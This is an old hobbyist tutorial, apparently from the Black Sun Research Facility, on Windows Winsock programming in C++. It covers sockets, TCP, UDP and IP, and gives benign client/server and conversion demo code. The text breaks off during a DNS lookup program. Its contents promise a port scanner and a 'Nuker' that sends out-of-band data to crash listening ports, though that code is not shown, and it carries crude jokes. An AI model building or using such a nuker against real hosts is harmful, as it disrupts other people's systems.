_________________ /_ /\ \/ _______ / \ / / / / / / /______/ / / / __/ / / _______ \ __/ / / / / \ / /______/ / / _/ / / /______________/ / BLACK SUN RESEARCH FACILITY \ \ / HTTP://BLACKSUN.BOX.SK \______________\/ WINDOWS INTERNET PROGRAMMING ================================================= WRITTEN BY [ cos125@hotmail.com :E-MAIL ] BINARY RAPE [ 114603188 :ICQ# ] [ www.geocities.com/wininetprogram :WEB SITE ] [ http://blacksun.box.sk :TURORIALS ] Thanks to cyberwolf for letting me write this and BSRF for releasing it. Disclaimer ======================================= None of the information or code in this tutorial is meant to be used against others or to purposely damage computer systems or cause any loss of or damage to property. Further more neither myself or any other contributor to, or member of, the Blacksun research Facility (BSRF) can be held responsible for damage or loss of property of computer systems as a result of this tutorial. In this tutorial the code is provided as a learning aid so you can see how its done its not meant for you to use against yourself or others. Also in the Exercises sections you are encouraged to alter the code and improve it. I say create or build a program to do something not create or build a program to do something and use it for that purpose. CONTENTS ======================================= 1. Introduction 2. Different types of Sockets 3. Protocols 3.1 What is TCP 3.2 What is UDP - An alternative 3.3 Introducing IP - The main protocol 3.4 TCP and UDP common functions 3.5 UDP specific functions 3.6 TCP specific functions 3.7 Structures 3.8 Converting 3.9 The application layer 4. Clients and servers 4.1 Bracaman's Server example - Win32 4.2 Bracaman's Client example - Win32 5. Exploring the Winsock 5.1 Looking at inet_addr() 5.2 Looking at htons() 5.3 Exploring Winsock functions [ EXERCISES ] 6. Common Internet Programs 6.1 DNS 6.2 Port Scan 6.3 Nuker [ EXERCISES ] 7. E-Mail - SMTP [ EXERCISES ] 8. WinInet - FTP [ EXERCISES ] 9. Another Protocol - ICMP [ EXERCISES ] 10. Other Internet code 10.1 Internet connections 10.2 CGI Programming [ EXERCISES ] 11. Last Words Questions And Answers APPENDIXES A - The Compiler B - IP and Port Numbers C - Servers and Clients D - Routers and Gateways E - Further reading F - Code ________________________________________________________________________________________________________ 1.0 INTRODUCTION ======================================= Welcome to Windows Internet Programming Part 1, the demented ramblings of a drunken Irish man. Learning Internet programming can be very useful in many areas, not just for programmers that wish to expand their knowledge but also to network administrators who should be more familiar with how it all works and students who need to learn quick or they will fail their exams ;). Even if you just want to learn programming as a hobbie then internet programming is a very easy way to get more power over connections and to better understand whats really going on underneath the hood of the internet. The language of choice in this tutorial is c++ and the compiler is microsoft visual c++. To find out how to set up your compiler for internet programming skip on ahead to Appendix A - The Compiler. If you are not familiar with several topics on the internet such as the following: 1. IP address's and Port numbers. 2. Server and client relationships. 3. Routers and Gateways. Then I suggest you at least read the sections Appendix B, Appendix C and Appendix D, or goto Appendix E - Further Reading. The protocols TCP, UDP, ICMP and IP are going to be discussed in the following sections but they will all be addressed as we meet them so don't worry too much about them right now :). Most of the following sections have an Exercises section at the end, just some suggestions about what to do with the code after you read the section. Youy are free to distribute the code that I write in this tutorial and this tutorial itself but remember you must keep it intact. Use this file as a reference for anything you want even your own papers or tutorials but please let me know if you do, id just like to know if this tutorial is of use to you. Ive made a website to coincide with this, and future tutorials and it should have a mailing list on it to, this website will have articles and source code that are like add-on's to the tutorial, even when its finished. The site should deal with internet technologies and programming in general as well as this tutorial. The url is available at the top of the page (^ UP THERE ^). There should be more additions to this tutorial soon as this is only version 1.0. Feel free to send comments, questions and suggestions to me at my e-mail address above or add me to your icq list. Well without further adue Please read on as because im about to send this e-mail onto cyberwolf because he keeps giving out to me for it being late :). (Sorry cyber ive just been having alot of sex the last couple of weeks) ________________________________________________________________________________________________________ 2.0 DIFFERENT TYPES OF SOCKETS ======================================= There are 2 different main types of Sockets. 1. Streaming sockets. 2. Datagram sockets. Programming TCP and UDP from scratch is difficult and involves alot of overhead. For this reason the idea of sockets were created. The socket paradigm was developed at the University of California at Berkelely. These sockets were designed for unix and similiar operating systems. In January of 1993 the Winsock was created to keep Bill Gates feet warm.. nnaahhh winsock is short for Windows Sockets and is an implementation of Berkeley sockets but designed to take advantage of Windows message driven architecture. The winsock API was designed quickly in order to get it out as early as possible and therefore the scope of the architecture mostly focused on TCP/IP but could still implement protocols such as UDP (thankfully!). Because Windows Sockets is based on the same sockets as unix, porting is quiet easy between the two, we'll cover porting and multiple platform support in a later tutorial. The Winsock is implemented trough the Winsock32.DLL in one of you system folders. It acts as a layer between you (the programmer) and the hardware level (where packet generation and so on takes place). You provide some perameters for the winsock such as the contents of the datagram, the target IP address and the target port number and by calling some functions like sendto(); or recvfrom(); the winsock creates the neccessary packets and sends or recieves datagrams. The current version of Winsock is 2.0 and it takes more advantage of windows messaging and implements better support for protocols other than TCP/IP. +----------------------+ +-------------------------+ Your Application | | | | | Winsock2 Application | | Winsock 1.1 Application | | | | | +----------------------+ +-------------------------+ | | | | | | +-----------------------------------------------------+ The Winsock | Wsock32.dll - The Winsock DLL | +-----------------------------------------------------+ | | | +-----------------------------------------------------+ The Transport Layer | The Hardware Layer | +-----------------------------------------------------+ FIG 1. - How your program and sockets talk. ________________________________________________________________________________________________________ 3.0 PROTOCOLS ======================================= There are several protocols that we use in internet programming. The first is IP and this is the base layer for Protocol programming. The next 2 protocols are TCP, which is orientated with streaming sockets, and then theres UDP which is orientated around datagram sockets. Using these protocols we can build programs which run on the application layer and form protocols such as FTP and HTTP. 3.1 WHAT IS TCP? ======================================= TCP is the Transmission Control Protocol. TCP is a protocol developed to make sure that packets were not lost on the internet as routers sent them from computer to computer. You see when you want to send a file across the internet trough TCP you send the file to the "TCP stack" (which is just another way of saying the Winsock). TCP then splits up the file into little pieces, each piece is called a datagram, the size of each piece depends on how good the tcp is on your computer and on the computer your sending the file to. So if your computer can handle datagrams that are 1 kb large and smaller and your friends computer can handle datagrams that are 500 bytes large and smaller, your TCP will divide a file into datagrams that are 500 bytes largeso that both your computer and your friends can handle the size of the datagrams. Otherwise it would be like trying to push a triangular peg into a round hole, it wouldn't fit. The same as trying to squeeze digital larceny's mother into a normal bus seat, her ass is just too fat. Now TCP was designed to keep track of every piece that it sends and to do so it numbers every datagram that it creates, so we have 3 datagrams from a 1.5 kb file, first datagram is numbered 0, second 500 and third is 1500. Thanks to this numbering feature and some built in error checking functions TCP ensures that when you send the datagrams A, B and C in that order they arrive in the order A B C and not something like C A B. But how does TCP store these numbers? These numbers along with other information about the datagram, such as the IP address and port number of where its being sent, is stored in something called a header. A Datagram is wrapped up in a Header which contains information, this is why TCP was created, to store and control the safe sending and recieving of Datagrams across the internet. So with this example in mind say if I wanted to send a 1.5 kb file to a friend. Its a fairly small file compared to most but still big enough that it needs to be split up by TCP. +-----------------+ File before being sent | 1.5 kb file | +-----------------+ | +-----+------+ | | | +----+-----+------+ File split into datagrams on a 500 byte TCP connection | 0 | 500 | 1500 | +----+-----+------+ | | | | | | +----+-----+------+ TCP headers wrapped around Datagrams | H | H | H | +----+-----+------+ | 0 | 500 | 1500 | +----+-----+------+ FIG 2. - TCP spliting a file into datagrams and wrapping them in their header. 3.2 WHAT IS UDP - AN ALTERNATIVE ======================================= UDP was designed as an alternative to TCP, only problem is while TCP has built in error checking and ensures that your file is recieved just the same way as it was sent UDP doesn't it just sends out its datagrams and lets them find their own way to the host. With TCP your quarenteed your sending A B C to a person but with UDP it could be more like B A C. Because of this UDP is considered unreliable and is not counted on for important transfers. Still UDP is not as bad as every-one says and the error rate is kinda low, still for important transfers you just can't count on 'kinda' low. UDP is better used on lan's and ethernet's than the internet because on these smaller networks it is extremely rare that you would loose a datagram. So if it is so unreliable why was it created? Well there is a reason UDP is unreliable, it sacrifices its reliability for speed. There are many cases where UDP is a definite advantage such as when you only need one datagram sent, then you wouldnt need to worry whether A B C arrived in order cos' your only sending A. UDP wraps datagrams in its own header for transmission, these headers are smaller and contain less info than TCP headers but like I said sometimes UDP is a definite advantage. 3.3 INTRODUCING IP - THE MAIN PROTOCOL ======================================= IP stands for Internet Protocol and all other protocols such as TCP and UDP ride piggy back on it. IP doesn't divide files up into datagrams and the like it already has that job done for it by TCP and UDP. IP is sent the datagram with a header wrapped around it (either a TCP or UDP header it doesn't matter), and it wraps its own header around it. Now we have a datagram with 2 seperate headers wrapped around it, the TCP header and the IP header. This formation is known as an IP Packet. All information, e-mails, web-pages, messages and files are sent across the internet in IP Packets. IP headers are used to provide information to routers as opposed to, say for example TCP, whose headers are meant for servers and clients to tell them how to put datagrams together. The IP header contains information like the IP# and port number of the host its being sent to, which it extracts from the TCP or UDP header, so that it can tell the routers where it wants to go. The TTL is the Time To Live of the packet we are sending. Rather than the time to live specifying the amount of time in seconds or minutes that the packet exists for it contains a number which states how many routers the packet can meet before it is destroyed. The TTL is a number specified by you (the programmer). For example if we set the time to live field as 10 in the IP header then the packet can meet ten routers before it is destroyed. Each router that the packet meets subtracts 1 from the number so that after the packet meets the first router the TTL will be equal to 9 and after the second it will be 8. When the TTL hits 1 the router subtracts 1, gets 0 and throws away the packet, this is to ensure that if a packet gets lost it wont just wander around the internet forever. +-----------------------+ | IP Header | +-----------------------+ |+---------------------+| || TCP Header || |+---------------------+| ||+-------------------+|| ||| ||| ||| Datagram ||| ||| ||| ||| ||| ||+-------------------+|| |+---------------------+| +-----------------------+ Fig 3. - Structure of an IP Packet. 3.4 TCP AND UDP COMMON FUNCTIONS ======================================= TCP and UDP contain both common and different functions. All of these functions are contained within the winsock.h header file (which is contained in windows.h). [ WSAStartup() ] WSAStartup() must be called every time that we start internet code in an application. This function calls the winsock so that we can use it. Every windows winsock program begins with this function. [ WSACleanup() ] Like WSAStartup();, WSACleanup(); must be called in every winsock program, it however is called at the end of the code as opposed to the beginning like startup(); is. This function is the equivilant to unix's, close() and shutdown() functions. Its very important that every single WSAStartup() has a corresponding WSACleanup(). [ Socket() ] The next important function is socket(); and is used by both protocols. This function contains 3 parameters, 1. Domain 2. Type 3. Protocol 1. Domain - There are several values you can set domain to depending on the purpose of the socket. In this tutorial were going to set the domain to AF_INET in order to use internet protocols. 2. Type - The value of type depends on what sockets you use. Remember there are 2 types of sockets, Streaming and Datagram. TCP is stream orientated and UDP is datagram orientated. Therefore if we wish to use TCP we set the type to SOCK_STREAM and if we want to use UDP we set it to SOCK_DGRAM 3. Protocol - This isn't important we can set it to 0. Once we create the socket trough this function we can read and write to and from it. So anything we send to the socket is transmitted across the internet connection and anything sent to us can be read from the connection. [ closessocket() ] closesocket() function is used to close a socket that you have already created. This function has 1 parameter, the name of the socket you created. 1. Socket - The name of the socket you declared. This function closes the socket and once called no more reading or writing can be made to the socket. To use this function you must first declare socket. Any-1 that try's to read or write to the socket will recieve errors once this function is called. [ gethostbyname() ] This function returns the IP address of a host, for example; gethostbyname("www.microsoft.com"); would return the IP address of the misrosoft website. This function is whats behind the DNS program and theres many occassions when obtaining the unknown IP address of a website can be useful in programming. [ gethostbyaddr() ] This function does the opposite of gethostbyname(). In this function we pass an IP address as the parameter and a host name is returned. 3.5 UDP SPECIFIC FUNCTIONS ======================================= Unlike the previous section which contained functions used by both UDP and TCP applications this section contains functions which are specific to UDP, that is you only use them in a program that is using UDP as the protocol of choice. [ sendto() ] The sendto() function is used to send datagrams across the connection we have established and we pass it 6 parameters. 1. Sock - The socket that weve made earlier. 2. Msge - The information we want to send. 3. Len - The length of the information we wish to send. 4. Flags - This is set to 0. 5. To - The pointer to struct sockaddr. 6. Tolen - The sizeof(struct sockaddr). sendto() returns the number of bytes sent and returns -1 on error. [ recvfrom() ] This is sendto() 's counterpart, where we use sendto() to send information and write to a socket, we use recvfrom() to read from that socket and recieve information from a computer on the internet. 1. Sock - The socket that weve made earlier. 2. Buf - The buffer to read information into. 3. Len - The maximum length of the buffer. 4. Flags - This is set to 0. 5. From - The pointer to struct sockaddr 6. Fromlen - The pointer to an int with the value of sizeof(struct sockaddr) recvfrom() returns the number of bytes recieved and returns -1 on error. 3.6 TCP SPECIFIC FUNCTIONS ======================================= Like UDP, TCP has 2 specific fuctions for sending and receiving information on the internet, these functions look very similiar but dont have as many parameters. [ send() ] send() is the same as UDP's sendto() and has 4 parameters. 1. Sock - The same as sendto(). 2. Msge - The same as sendto(). 3. Len - The same as sendto(). 4. Flags - The same as sendto(). send() returns the number of bytes sent and returns -1 on error. [ recv() ] recv() is the same as UDP's recvfrom() and has 4 parameters. 1. Sock - The same as recvfrom(). 2. Msge - The same as recvfrom(). 3. Len - The same as recvfrom(). 4. Flags - The same as recvfrom(). recv() returns the number of bytes recieved and returns -1 on error. Unlike UDP, TCP is a connection orientated protocol, what this means is that you first must form a connection with the host before you can begin sending and recieving information to one another. TCP has several specific functions for forming this connection. [ connect() ] After we start up the winsock in a TCP application and set up the socket we must call this function in order to form the connection. It has 3 parameters. 1. Sock - The socket that weve made earlier. 2. To - The pointer to struct sockaddr. 3. ToLen - The sizeof(struct sockaddr). You will recognise all of these parameters from earlier and theres nothing new to explain here. This function is used to connect to an IP address on a defined port and returns -1 on error. TCP again varies from UDP by requiring special functions when creating a server. These are bind() and listen(). [ bind() ] bind() has 3 parameters. 1. Sock - The socket that weve made earlier. 2. My_addr - The pointer to struct sockaddr. 3. ToLen - The sizeof(struct sockaddr). bind() is used to form a connection to a port on your own computer. All servers have specific ports, an http servers port is 80 and an ftp servers port is 21. With servers we must bind() to a specific port so that clients know how to talk to us. When I bind(); to port 13 all IP packets sent to port 13 on my computer are directed to my program. [ listen() ] listen() only contains 2 parameters. 1. Sock - The socket that weve made earlier. 2. BackLog - The number of connections allowed. We use listen() when we are waiting for a connection. You must call bind() before listen() so the program knows what port it is supposed to be listening to for packets. 3.7 STRUCTURES ======================================= There are several structures used in winsock programming to make referencing objects that much easier. [ sockaddr ] You'll notice that in the last section I refered to "struct sockaddr" but what is it? sockaddr is a c++ structure which holds 2 pieces of information about the socket. 1. Sa_family - The address family. 2. Sa_data[14]; - 14 bytes of the protocol address. [ sockaddr_in ] Another structure is sockaddr_in which we use to reference elements of the socket. 1. Sin_family - The address family. 2. Sin_port - The Port number. 3. Sin_addr - The Internet Address. sin_family is usually set to AF_INET in most programs. It tells the program what kind of network its going to be used for, in this case AF_INET (the internet). sin_port is a number used for the internet connection such as 80. sin_addr is the internet address to be used in the connection such as 127.0.0.1. [ hostent ] The final structure we are going to look at is hostent. This structure is used to refer to remote hosts, like www.microsoft.com or blacksun.box.sk. This structure is most commonly used to find the IP address or the host name of a remote computer. We can reference information mainly by using only 1 part. 1. Hostent->h_name This is used to get the IP number when provided the host name. The rest of the structure isn't important right now but we may cover it later. 3.8 CONVERTING ======================================= [ htons() ] Theres a little problem with numbers on the internet, intel chips store them one way and motorola chips store them a different way. So how do we make sure that our programs can work alongside macintosh computers which use the motorola chip? There is a function called htons() which will convert the number thankfully and its really easy to use. This function has only 1 paramater 1. Port - The port number. It takes the port number we pass to it and converts it, saving us from annoying overhead. We'll use htons() later when we have to fill up structures. [ inet_addr ] Before we can fill up our structures tough we first have to supply an IP address and in order for the program to do this we must convert the address into an unsigned long. To do this we pass the IP address to the function inet_addr() as its only parameter. 1. Address - The IP Address. 3.9 THE APPLICATION LAYER ======================================= Mostly on the internet you'll hear things like ftp and http and how they are protocols. This is true as what a protocol is, is a defined set of rules on how to interact, like a certain way for 2 computers to talk to eachother. These protocols however are not quiet the same as TCP or UDP, just as those 2 aren't the same as IP. We can seperate and define these protocols by placing them in layers. IP is the base layer the one where most fundamental communication takes place (getting from one place to another), and protocols like TCP are built on top of IP so they are on a different layer. The same way FTP and HTTP are built on top of TCP so they are on a higher level. This can best be shown with a diagram I think (or maybe its not I just like making diagrams ;),). +-------------------+ | Application Layer | - FTP, HTTP. +-------------------+ | Transport Layer | - TCP, UDP. +-------------------+ | Protocol Layer | - IP. +-------------------+ | Hardware Layer | - Network Card. +-------------------+ Fig 4. - Protocol Layering. The Hardware Layer is of course where packets are created and everything on the network and ethernet cards themselves. ________________________________________________________________________________________________________ 4.0 CLIENTS AND SERVERS ======================================= Since this tutorial is trying to run parallel to BracaMans unix sockets tutorial (also available from blacksun.box.sk). We are going to use the same programs as in his tutorial except ported for use in windows. 4.1 BRACAMANS SERVER EXAMPLE - WIN32 ======================================= /* <---- SOURCE CODE STARTS HERE ----> */ #include#include #include #define PORT 3550 /* Port that will be opened */ #define BACKLOG 1 /* Number of allowed connections */ struct sockaddr_in server; /* server's address information */ struct sockaddr_in client; /* client's address information */ int sin_size; WSADATA wsdata; SOCKET fd, fd2; DWORD wsock; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Server"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Server"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Server", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { WSAStartup(0x0101,&wsdata); if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) /* calls socket() */ { MessageBox(0,"Socket Error","Error",0); return -1; } server.sin_family = AF_INET; server.sin_port = htons(PORT); /* Remember htons() from "Conversions" section? =) */ server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */ if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1) /* calls bind() */ { MessageBox(0,"Bind Error","Error",0); return -1; } if(listen(fd,BACKLOG) == -1) /* calls listen() */ { MessageBox(0,"Listen Error","Error",0); return -1; } while(1) { sin_size = sizeof(struct sockaddr_in); if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size)) == -1) /* calls accept() */ { MessageBox(0,"Accept Error","Error",0); return -1; } MessageBox(0,"Client connected to server.","Connection",0); send(fd2,"Welcome to my server.\n",22,0); /* send to the client welcome message */ WSACleanup(); return -1; } } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This is the same code as the streaming server in bracamans tutorial, except this has been ported to windows, the names bracaman uses in the program and the comments are the same. 4.2 BRACAMANS CLIENT EXAMPLE - WIN32 ======================================= And of course every server has to have a client... /* <---- SOURCE CODE STARTS HERE ----> */ #include #include #define PORT 3550 /* Port that will be opened */ #define MAXDATASIZE 100 /* Max number of bytes of data */ struct hostent *he; /* structure that will get information about remote host */ struct sockaddr_in server; /* server's address information */ int numbytes; /* files descriptors */ char buf[MAXDATASIZE]; /* buf will store received text */ WSADATA wsdata; SOCKET sock; DWORD wsock; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { WSAStartup(0x0101,&wsdata); he = gethostbyname("localhost"); /* calls gethostbyname() */ if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) /* calls socket() */ { MessageBox(0,"Socket Error","Error",0); return -1; } server.sin_family = AF_INET; server.sin_port = htons(PORT); /* htons() is needed again */ server.sin_addr = *((struct in_addr *)he->h_addr); /* he->h_addr passes "*he"'s info to "h_addr" */ if(connect(sock,(struct sockaddr *)&server,sizeof(struct sockaddr)) == -1) /* calls connect() */ { MessageBox(0,"Connection Error","Error",0); return -1; } if ((numbytes = recv(sock,buf,MAXDATASIZE,0)) == -1) /* calls recv() */ { MessageBox(0,"Receiving Error","Error",0); return -1; } buf[numbytes]='\0'; MessageBox(0,buf,"Server Message",0); /* it prints server's welcome message =) */ WSACleanup(); return -1; } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ Again the code is almost the exact same as the original just ported and 1 or 2 different names for things. We have covered all of this stuff already so theres nothing new here for you to learn except of course for how to put it all together :). As you can tell from the code, both the client and server are stream orientated, and what does this mean? It means that they use TCP rather than UDP as the protocol. ________________________________________________________________________________________________________ 5.0 EXPLORING THE WINSOCK ======================================= Of course its the winsock that makes all this code work and ive already told you what functions like htons() and inet_addr() do to numbers, but now its time to show you. 5.1 LOOKING AT INET_ADDR ======================================= /* <---- SOURCE CODE STARTS HERE ----> */ #include #include void outtie(char *p) { FILE *fp=fopen("c:\\inet_addr.txt","a+"); fprintf(fp,"%s\n",p); fclose(fp); } long adrss; char output[200]; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { adrss = inet_addr("127.0.0.1"); sprintf(output,"Internet Address = %ld",adrss); outtie(output); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This program is simple, in the beginning we set up the function outtie, this function takes the char, output, and prints it to a file called inet_addr.txt in the C:\ drive. We go all inet_addr on the IP address 127.0.0.1's ass and put the result in output. We then call outtie(); and the result of inet_addr is put into the text file. Taadaaaa. Run this program and click on the client area, wait a second then close it. Goto your C:\ drive and open the file inet_addr.txt. The file should look something like this [ inet_addr.txt ] Internet Address = 537001100 and that is that. 5.2 LOOKING AT HTONS() ======================================= /* <---- SOURCE CODE STARTS HERE ----> */ #include #include long port; char output[200]; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { port = htons(80); sprintf(output,"Port 80 = %ld",port); MessageBox(0,output,"Port",0); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This program is very similiar to the last one but this one looks at htons() rather than inet_addr. Here we have chosen to display the result in a messagebox tough rather than a text file. The result should be a message box with caption, "Port" and text saying Port 80 = 20480. 5.3 EXPLORING WINSOCK FUNCTIONS ======================================= /* <---- SOURCE CODE STARTS HERE ----> */ #include #include WSADATA ws; DWORD wsock; char msge[200]; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { wsock = WSAStartup(0x0101,&ws); sprintf(msge,"wsock..%ld",wsock); MessageBox(0,msge,msge,0); sprintf(msge,"wVersion....%d",ws.wVersion); MessageBox(0,msge,msge,0); sprintf(msge,"wHighVersion....%d",ws.wHighVersion); MessageBox(0,msge,msge,0); sprintf(msge,"szDescription....%s",&ws.szDescription); MessageBox(0,msge,msge,0); sprintf(msge,"szSystemStatus....%s",&ws.szSystemStatus); MessageBox(0,msge,msge,0); sprintf(msge,"iMaxSockets....%u",ws.iMaxSockets); MessageBox(0,msge,msge,0); sprintf(msge,"iMaxUdpDg....%u",ws.iMaxUdpDg); MessageBox(0,msge,msge,0); sprintf(msge,"lpVendorInfo....%s",ws.lpVendorInfo); MessageBox(0,msge,msge,0); MessageBox(0,"Finished","End",0); WSACleanup(); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ This program calls several functions of winsock and displays the results to us in message box's. These can be handy if, for example I wanted to tell some-1 what version of winsock there running I would call &ws.szDescription which in my case would say Winsock 2.0, in a nicely human readable value. [ EXERCISES ] Look trough the file winsock.h in your compiler include folder. See what else there is in winsock that can be demonstrated in these kinds of programs. ________________________________________________________________________________________________________ 6.0 Common Internet programs ======================================= In this section were going to build a few common internet applications using the information that we have learnt so far. These programs are: 1. DNS - Gets a hostname and returns its IP address. 2. Portscan - Gets port numbers and tells user whether there open or not. 3. Nuke - Sends OOB data to a listening port. 6.1 DNS ======================================= /* <---- SOURCE CODE STARTS HERE ----> */ #include #include #include int CDECL MessageBoxPrintf (TCHAR * szCaption, TCHAR * szFormat, ...) { TCHAR szBuffer [1024]; va_list pArgList; va_start (pArgList, szFormat); _vsntprintf (szBuffer, sizeof (szBuffer) / sizeof (TCHAR), szFormat, pArgList); va_end (pArgList); return MessageBox (NULL, szBuffer, szCaption, 0); } WSADATA wsdata; SOCKET sock; DWORD wsock; LRESULT CALLBACK recall (HWND, UINT, WPARAM, LPARAM); int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; 